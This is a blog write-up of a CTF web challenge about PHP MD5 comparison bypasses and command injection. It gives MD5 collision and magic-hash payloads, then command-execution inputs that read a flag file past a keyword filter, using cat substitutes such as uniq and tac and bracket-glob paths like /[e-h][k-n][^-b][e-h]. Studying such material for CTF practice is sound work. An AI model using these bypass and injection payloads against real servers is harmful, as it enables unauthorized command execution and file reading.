[NSSRound#16 Basic]RCE但是没有完全RCE

已于 2024-01-18 11:52:38 修改
阅读量768 收藏 8
点赞数 11
分类专栏: CTF 文章标签: 网络安全 web安全 http 网络 笔记
于 2024-01-18 11:15:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_64422989/article/details/135669454
版权

题目代码:
image.png

<?php
error_reporting(0);
highlight_file(__file__);
include('level2.php');
if (isset($_GET['md5_1']) && isset($_GET['md5_2'])) {
    if ((string)$_GET['md5_1'] !== (string)$_GET['md5_2'] && md5($_GET['md5_1']) === md5($_GET['md5_2'])) {
        if (isset($_POST['md5_3'])&&md5($_POST['md5_3']) == md5($_POST['md5_3'])) {
            echo $level2;
        } else {
            echo "您!!!!!那么现在阁下又该如何应对呢";
        }
    } else {
        echo "还在用传统方法????";
    }
} else {
    echo "来做做熟悉的MD5~";
}

第一个是md5强类型比较,用数组md5_1[]=1&md5_2[]=2不行,那就用md5碰撞,使用payload:

?md5_1=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&md5_2=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2

第二个是md5弱类型比较,
只要两个数的md5加密后的值以0e开头就可以绕过,因为php在进行弱类型比较(即==)时,会先转换字符串的类型,再进行比较,而在比较时因为两个数都是以0e开头会被认为是科学计数法,0e后面加任何数在科学计数法中都是0,所以两数相等,
使用这些payload都可以:

240610708:0e462097431906509019562988736854
QLTHNDT:0e405967825401955372549139051580
QNKCDZO:0e830400451993494058024219903391
PJNPDWY:0e291529052894702774557631701704
NWWKITQ:0e763082070976038347657360817689
NOOPCJF:0e818888003657176127862245791911
MMHUWUV:0e701732711630150438129209816536
MAUXXQC:0e478478466848439040434801845361

然后就通过了第一关:
image.png

第二关,访问3z_RC3.php
image.png
GET传参cmd=dir /,POST传参shell=system
因为l被过滤了,用不了ls,所以可以用dir
然后再根目录发现flag
image.png
cat用不了可以用more``uniq等等很多,具体可以参考大佬博客:[http://t.csdnimg.cn/LMuXV](http://t.csdnimg.cn/LMuXV)

more:一页一页的显示档案内容
less:与 more 类似 head:查看头几行
tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示
tail:查看尾几行
nl:显示的时候,顺便输出行号
od:以二进制的方式读取档案内容
vi:一种编辑器,这个也可以查看
vim:一种编辑器,这个也可以查看
sort:可以查看
uniq:可以查看 file -f:报错出具体内容 grep
1、在当前目录中,查找后缀有 file 字样的文件中包含 test 字符串的文件,并打印出该字符串的行。此时,可以使用如下命令: grep test *file strings

然后f``l``a``g``?``*都被过滤了,这时候可以用中括号[]来进行正则匹配.
例如[a-z]就表示匹配字母a到字母z中的任意一个字符
那就把GET传的参数改为?cmd=uniq /[e-h][k-n][^-b][e-h]
最后就得到flag了
image.png

NSSCTF{acd8b315-208c-4f87-8365-c697f9db397c}

收集其他师傅的payload:

/3z_RC3.php?cmd=system($_POST[1]);

shell=urldecode&1=cat /flag

这里妙就妙在让 s h e l l 形同虚设,让 shell形同虚设,让 shell形同虚设,让cmd自成一个包含函数和参数的完整命令执行。再要绕waf很自然就想到用$_POST[1]来转接。
B站风二西讲解视频【【CTF-web】[NSSRound#16 Basic]RCE但是没有完全RCE】 https://www.bilibili.com/video/BV1zi4y1i78T/?share_source=copy_web&vd_source=12088c39299ad03109d9a21304b34fef

Fab1an要努力~
关注
  • 11
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
无参 RCE
snowlyzz的博客
08-07 604
无参rce
[NSSCTF Round#16 Basic]RCE但是没有完全RCE
rev1ve的博客
01-14 575
不过我们可以试试利用数组绕过正则,然后如何让eval函数接收的参数为字符串而不是数组格式。所以思路可以是找到参数shell中的函数可以解析cmd参数的嵌套函数,或者是直接system函数利用最直接的命令绕过(试验后发现走不通),又或者是绕过正则判断而使得eval函数命令执行的时候不报错。,想要利用system直接读取flag会发现正则绕不过去,如果在cmd参数的值包含了嵌套的函数就会仅仅被当成字符串从而无法解析,比如。这里会先把GET传参的参数md5_1和md5_2变成字符串,然后MD5函数处理要强等于;
PHP漏洞之md5()
dogeace的博客
11-16 1243
本文参考 本文总结一下常见的PHP之一md5() 开始前先补充我们这一课所需要的知识。 PHP’==‘与’= = ='的区别。 PHP‘= =’ 与‘===’的区别,在我们使用= =号是时后的两个变量只要求数值相同例如A=123 B=‘123’当进行判断时A= =B是为真虽然他们的类型并不相同但当我们使用A= = =B进行判断时返回值却为假,因为两个变量的类型并不相同。所以我们把‘= = ’称为弱比较‘= = =’称为强比较具体的绕过方法我们再接下来的例子再进行讲解。 下面我们进入第一种PHP的弱比较 if
新生赛web
qq_63928796的博客
04-02 480
对于伪随机数,当seed固定时,生成的随机数是可以预测的,也就是顺序固定的,所以只要知道seed的值即可。其实反序列化很简单就是一步一步走到你要利用的函数,比如这个题我们要利用的就是。中echo了对象ll,一般字符串才可以echo所以触发了。,改session是要key的,key的计算也给出了。函数,因为只有这个函数才能命令执行,倒着来看就行,md5的强弱比较,百度一大堆,直接数组绕过即可。,他可以自动被触发,所以一整条链就完成了。,这个就是获取的上传文件的后缀,就是。典型的反序列化,看一下魔法函数。
[NSSRound#1 Basic]
ki10Moc的博客
08-03 543
看了本文会影响您一天的好心情的
rce-website:RCE网站
05-09
RCE网站RCE的主页(登录页面)和公告( )。 基于和修改的Polar主题。本地安装安装Python3( 完美运行) 安装Pelican和支持库pip install invoke==1.4.1pip install pelican==3.7.1pip install markdown==3.1.1如果...
sangfor EDR RCE
03-29
# Sangfor EDR RCE 影响版本: - EDR v3.2.16 - EDR v3.2.17 - EDR v3.2.19 exp: ``` python poc.py url http://10.10.10.0/ ```
Apache-druid-kafka-rce.yaml
04-30
kafka相关RCE漏洞poc,扫描器的yaml文件,可以导入yara扫描器进行授权漏洞渗透测试。
向日葵RCE漏洞一键批量自己检测工具
02-25
【标题】:“向日葵RCE漏洞一键批量自我检测工具” 在网络安全领域,"RCE"是"Remote Code Execution"的缩写,意为远程代码执行。这是一个非常严重的安全漏洞,允许攻击者在目标系统上执行任意代码,从而获得与系统...
Ice-001#-#Easy RCE using Docker API 复现1
07-25
Docker Daemon 作为守护进程,运行在后台,可以执行发送到管理接口上的 Docker 命令复现环境:各安装 docker安装 centos 因为现装的
[NSSRound#16 Basic]RCE但是没有完全RCE_isset($_post[‘md5_3‘])&amp;&amp;md5($_post[‘md5_3‘]) == md
weixin_58152093的博客
04-15 609
只要两个数的md5加密后的值以0e开头就可以绕过,因为php在进行弱类型比较(即==)时,会先转换字符串的类型,再进行比较,而在比较时因为两个数都是以0e开头会被认为是科学计数法,0e后面加任何数在科学计数法中都是0,所以两数相等,当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。(img-4ueh7NG0-1713191920091)]都被过滤了,这时候可以用中括号。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8379
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
软设之网络安全控制
最新发布
2301_81968528的博客
08-08 343
漏洞检测和安全风险评估技术,可预知主体受攻击的可能性和具体指证将要发生的行为和产生的后果。网络漏洞扫描技术主要包括网络模拟攻击,漏洞检测,报告服务进程,提取对象信息以及测评风险,提供安全建议和改进等功能,帮助用户控制可能发生的安全事件,最大可能消除安全隐患。IDS设备对于网络中的入侵行为往往是采用将入侵行为计入日志,并向网络管理员发出报警的方式来处理的,对于入侵行为并未主动的采取对应措施,响应方式单一。防火墙的作用是防止不希望的,未经授权的通信进出被保护的内部网络,通过边界控制强化内部网络安全策略。
C++在网络安全领域的应用
2302_79331124的博客
08-04 1122
总的来说,C++在网络安全领域的应用广泛且深入。其高性能、灵活性和对底层硬件的控制使其成为开发各种安全解决方案的理想选择。随着网络安全威胁的不断演变,C++将继续在保护数字世界的过程中发挥重要作用。如果你对网络安全感兴趣,学习和掌握C++无疑将为你的技术发展方面提供强大的助力。
《密码编码学与网络安全原理与实践》第四章第六章第七章 对称加密体制
m0_57291352的博客
08-06 1001
对称加密包括分组密码和流密码分组密码:信息被分块(block)进行加密和解密,连续的明文元素使用相同的密钥K来加密,密文C=c1c2…=EK(m1)EK(m2)…C =c_1c_2…=E_K(m_1)E_K(m_2)…C=c1​c2​…=EK​(m1​)EK​(m2​)…。分组密码可以看作是一个字符长度很大代换——如64比特或更多。大部分的分组对称密码都基于Feistel结构。可逆变换是必要条件。设计”安全”的密码算法不难,只要使用足够多的轮数就可以,但降低速度,因此所有问题就是平衡问题。流密码:流密码中按
Web安全学习
荆鹏的博客
08-06 369
应用层:为用户为用户的应用进程提供网络通信服务协议——DNS协议、HTTP协议、HTTPS协议传输层:负责两台主机之间的数据传输,将数据从发送端传输到接收端协议——TCP协议、UDP协议网络层:负责传输的地址管理和路由选择,在众多复杂的网络环境中确定一条合适的路径协议——IP协议数据链路层:负责设备之间数据帧的传送和识别,将网络层传递的数据报封装成帧,在处于同一个数据数据链路节点的两个设备之间传输协议——ARP协议、MTU协议。
网络安全风险扫描原理及工具使用
qyq88888的专栏
08-08 885
通过一定的技术手段发现系统和软件存在的安全漏洞、弱口令。
通达OA文件上传与文件包含漏洞引发的RCE分析
"通达OA任意文件上传配合文件包含导致的RCE影响多个版本,包括V11版、2015-2017版、2013版以及2013增强版。利用该漏洞,攻击者可以通过Python等脚本执行命令,如`python3.pyhttp://10.0.0.1:81whoami`,获取服务器...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Fab1an要努力~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值